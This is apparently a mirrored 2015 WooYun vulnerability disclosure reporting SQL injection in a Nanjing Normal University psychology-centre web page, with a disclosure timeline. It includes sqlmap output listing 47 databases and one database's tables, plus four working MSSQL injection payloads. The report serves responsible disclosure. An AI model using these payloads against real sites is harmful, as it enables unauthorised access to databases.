乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-23: 细节已通知厂商并且等待厂商处理中 2015-08-24: 厂商已经确认,细节仅向厂商公开 2015-09-03: 细节向核心白帽子及相关领域专家公开 2015-09-13: 细节向普通白帽子公开 2015-09-23: 细节向实习白帽子公开 2015-10-08: 细节向公众公开
南京师范大学某站存在一处SQL注入漏洞
1# 漏洞存在于心理学实验教学中心网站中
http://**.**.**.**/xinli/TeaShow.aspx?TypeNo=47&teaNo=7
其中的TypeNo和teaNo参数均存在注入
2# 47个库
current user: 'xinli'current database: 'NSXinLiXue'current user is DBA: Falseavailable databases [47]:[*] BZBB_lw[*] ChuangXinNS[*] db_dike[*] db_dndqjzw[*] db_njsdjw[*] db_njsfsy[*] db_nsddlhj[*] db_nsdhgxn[*] db_nsdmba[*] db_nsdMediaC[*] db_nsdscw[*] db_nsdsw[*] db_nsdswyy[*] db_nsdswzy[*] db_nyspjc[*] db_sdjxjy[*] db_spaqjc[*] JiaoCai[*] master[*] MBA[*] model[*] msdb[*] njnulab[*] njnupj[*] nju[*] nju2222[*] njuold[*] njupj2012[*] Northwind[*] NSD_ApplicationChemical[*] NSD_Cnooc[*] NSD_ElectricalEngineering[*] NSD_ElectronicInformation[*] NSD_TeacherSkills[*] NSD_TeachingTeam[*] nsddky_sy[*] nsdsfjdzx[*] nsdsfjdzxnew[*] nsglxt[*] NSHuaKe[*] NSXinLiXue[*] NY_JG[*] pubs[*] ShangXueYuannew[*] tempdb[*] zhongxin[*] zhongxinold
3# zhongxin库中的表
Database: zhongxin+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.tongji | 1853 || dbo.dike_sqb | 1480 || dbo.chuanmei_News | 869 || dbo.news | 404 || dbo.faxue_News | 279 || dbo.meishu_News | 169 || dbo.dianqi_News | 135 || dbo.sw_News | 101 || dbo.jinnv_News | 95 || dbo.sw_links | 88 || dbo.dianqi_szdw | 82 || dbo.chuanmei_SmallClass | 71 || dbo.classurl | 69 || dbo.xinli_News | 69 || dbo.dike_szdw | 60 || dbo.dike_News | 55 || dbo.jiaoyu_News | 48 || dbo.meishu_SmallClass | 44 || dbo.faxue_down | 43 || dbo.huaxue_News | 43 || dbo.huaxue_SmallClass | 43 || dbo.meishu_szdw | 33 || dbo.dike_SmallClass | 30 || dbo.sw_down | 21 || dbo.meishu_sqb | 20 || dbo.dike_szdwzdy | 19 || dbo.dianqi_down | 18 || dbo.meishu_down | 18 || dbo.dike_down | 17 || dbo.faxue_SmallClass | 16 || dbo.huaxue_szdw | 15 || dbo.jinnv_down | 15 || dbo.xinli_down | 15 || dbo.chuanmei_BigClass | 13 || dbo.dike_BigClass | 13 || dbo.faxue_szdw | 13 || dbo.huaxue_BigClass | 13 || dbo.sw_SmallClass | 13 || dbo.sysconstraints | 13 || dbo.faxue_BigClass | 12 || dbo.jinnv_szdw | 12 || dbo.sw_szdw | 12 || dbo.faxue_sqb | 11 || dbo.chaunmei_sqb | 10 || dbo.chuanmei_down | 10 || dbo.dianqi_BigClass | 10 || dbo.dianqi_sqb | 10 || dbo.jiaoyu_down | 10 || dbo.jiaoyu_SmallClass | 10 || dbo.jinnv_sqb | 10 || dbo.sw_sqb | 10 || dbo.xinli_BigClass | 10 || dbo.xinli_sqb | 10 || dbo.chuanmei_links | 9 || dbo.jiaoyu_BigClass | 9 || dbo.jinnv_BigClass | 9 || dbo.jinnv_SmallClass | 9 || dbo.meishu_BigClass | 9 || dbo.sw_BigClass | 9 || dbo.xinli_SmallClass | 9 || dbo.jinnv_links | 8 || dbo.dianqi_SmallClass | 6 || dbo.link | 6 || dbo.Admin | 5 || dbo.huaxue_down | 5 || dbo.dianqi_links | 4 || dbo.dike_gg | 4 || dbo.meishu_gg | 4 || dbo.sw_gg | 4 || dbo.chuanmei_szdw | 3 || dbo.syssegments | 3 || dbo.xinli_Vote | 3 || dbo.chuanmei_gg | 2 || dbo.dianqi_gg | 2 || dbo.faxue_links | 2 || dbo.jiaoyu_gg | 2 || dbo.jinnv_gg | 2 || dbo.xinli_gg | 2 || dbo.faxue_gg | 1 || dbo.jiaoyu_szdw | 1 || dbo.xinli_links | 1 || dbo.xinli_szdw | 1 |+-------------------------+---------+
4# 库太多了,就不一一看了
Place: GETParameter: TypeNo Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: TypeNo=47' AND 6611=CONVERT(INT,(CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6611=6611) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58))) AND 'Kchf'='Kchf&teaNo=7 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: TypeNo=47' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(111)+CHAR(120)+CHAR(114)+CHAR(58)+CHAR(98)+CHAR(82)+CHAR(73)+CHAR(99)+CHAR(102)+CHAR(88)+CHAR(117)+CHAR(86)+CHAR(104)+CHAR(87)+CHAR(58)+CHAR(117)+CHAR(104)+CHAR(108)+CHAR(58)-- &teaNo=7 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: TypeNo=47'; WAITFOR DELAY '0:0:5'--&teaNo=7 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: TypeNo=47' WAITFOR DELAY '0:0:5'--&teaNo=7
别处应该也存在注入点,建议全站检查下
危害等级:中
漏洞Rank:6
确认时间:2015-08-24 08:22
通知用户处理中
暂无